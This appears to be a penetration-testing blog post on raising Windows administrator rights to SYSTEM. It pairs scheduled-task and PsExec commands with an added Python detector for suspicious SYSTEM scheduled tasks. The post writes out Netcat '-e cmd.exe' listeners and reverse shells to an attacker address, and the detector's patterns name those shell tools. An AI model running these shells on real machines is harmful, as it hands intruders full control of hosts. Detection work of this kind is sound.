Upgrading Admin to SYSTEM in Windows

Sometimes in an engagement, even though you have administrative privileges, there are commands you still do not have permission to run, or maybe you just want to type "whoami" and see "NT AUTHORITY\SYSTEM" come back, designating you master of the machine. Either way, here are a few ways I've found to escalate from an administrator account to SYSTEM.

The first is simply to find the current system time, then schedule a CMD session as a SYSTEM task for a short time in the future. To find the current time:

echo %time%

Then schedule the CMD session for a minute or so later, giving the time in 24-hour format:

at hh:mm /interactive cmd.exe

Sometimes, from within an RDP session, the scheduled system shell will not open on your desktop. In that case, this workaround has proven useful to me. You will have to copy Netcat to the target if it is not already there. Then schedule, as a SYSTEM task, a Netcat listener on localhost with a CMD process attached, as follows:

at hh:mm nc -l 127.0.0.1 -p 4443 -e cmd.exe

Then connect to the listener with Netcat, and voila! SYSTEM shell.

nc -nv 127.0.0.1 4443

Of course, this also works in spawning a reverse shell:

at hh:mm nc -nv <attacker ip> <attacker listen port> -e cmd.exe

If you are dealing with any version of Windows that has PowerShell installed, an easy method of SYSTEM escalation is to use a tool from the Windows PsTools suite called PsExec. To execute a command as SYSTEM, run PsExec with the -s flag. The rest is much like the above: spawn an interactive command window if you have desktop access, or a remote shell otherwise.

psexec -s <path to nc.exe>\nc -nv <attacker ip> <attacker listen port> -e cmd.exe

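The two `at`-based methods above leave a scheduled task behind, and the task definition is what a defender can audit: it is the XML carried in Security event 4698 ("A scheduled task was created") or exported from the task library. The check below is an added example, not code from the original post, and the three task definitions are constructed samples: it flags any task that runs as SYSTEM and whose action is a bare interactive cmd.exe or a Netcat `-e` listener, while letting an ordinary SYSTEM maintenance task through.

```python
import re
import xml.etree.ElementTree as ET

SYSTEM_IDS = {"S-1-5-18", r"NT AUTHORITY\SYSTEM", "SYSTEM"}
# Netcat started with -e hands cmd.exe to whoever connects to the listener.
NC_EXEC_RE = re.compile(r"(^|[\\/\s])nc(64)?(\.exe)?\s.*-e\s", re.I)
# A bare cmd.exe action (no /c or /k script to run) is an interactive shell,
# which is never what a maintenance task needs.
CMD_RE = re.compile(r"(^|[\\/\s])cmd(\.exe)?$", re.I)

def _local(tag):
    """Strip the Task Scheduler XML namespace so matching works with or without it."""
    return tag.rsplit("}", 1)[-1]

def _texts(root, name):
    return [(e.text or "").strip() for e in root.iter() if _local(e.tag) == name]

def flag_system_task(task_xml):
    """Return a finding dict if a task definition runs as SYSTEM and its
    action is an interactive shell or a netcat -e listener; else None."""
    root = ET.fromstring(task_xml)
    principal = next((u for u in _texts(root, "UserId") if u.upper() in SYSTEM_IDS), None)
    if principal is None:
        return None
    for exe in (e for e in root.iter() if _local(e.tag) == "Exec"):
        parts = {_local(c.tag): (c.text or "").strip() for c in exe}
        command, args = parts.get("Command", ""), parts.get("Arguments", "")
        full = f"{command} {args}".strip()
        if NC_EXEC_RE.search(full):
            return {"principal": principal, "command": full, "reason": "netcat -e shell as SYSTEM"}
        if CMD_RE.search(command) and not re.search(r"/[ck]\b", args, re.I):
            return {"principal": principal, "command": full, "reason": "interactive cmd.exe as SYSTEM"}
    return None

# Constructed sample task definitions (not captured from a real host).
NS = 'xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"'
AT_NC_TASK = f"""<Task {NS}><Principals><Principal id="Author"><UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel></Principal></Principals><Actions><Exec>
<Command>nc</Command><Arguments>-l 127.0.0.1 -p 4443 -e cmd.exe</Arguments></Exec></Actions></Task>"""
AT_CMD_TASK = f"""<Task {NS}><Principals><Principal id="Author"><UserId>S-1-5-18</UserId>
</Principal></Principals><Actions><Exec><Command>cmd.exe</Command></Exec></Actions></Task>"""
BACKUP_TASK = f"""<Task {NS}><Principals><Principal id="Author"><UserId>S-1-5-18</UserId>
</Principal></Principals><Actions><Exec><Command>cmd.exe</Command>
<Arguments>/c C:\\ops\\backup.bat</Arguments></Exec></Actions></Task>"""

if __name__ == "__main__":
    for name, xml_text in [("at nc", AT_NC_TASK), ("at cmd", AT_CMD_TASK), ("backup", BACKUP_TASK)]:
        print(name, "->", flag_system_task(xml_text))
```

The PsExec route leaves a different trace, a PSEXESVC service installation rather than a scheduled task, so it needs a separate check on service-install events.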
There are no doubt other ways, but these are a few of the ones I've found useful.
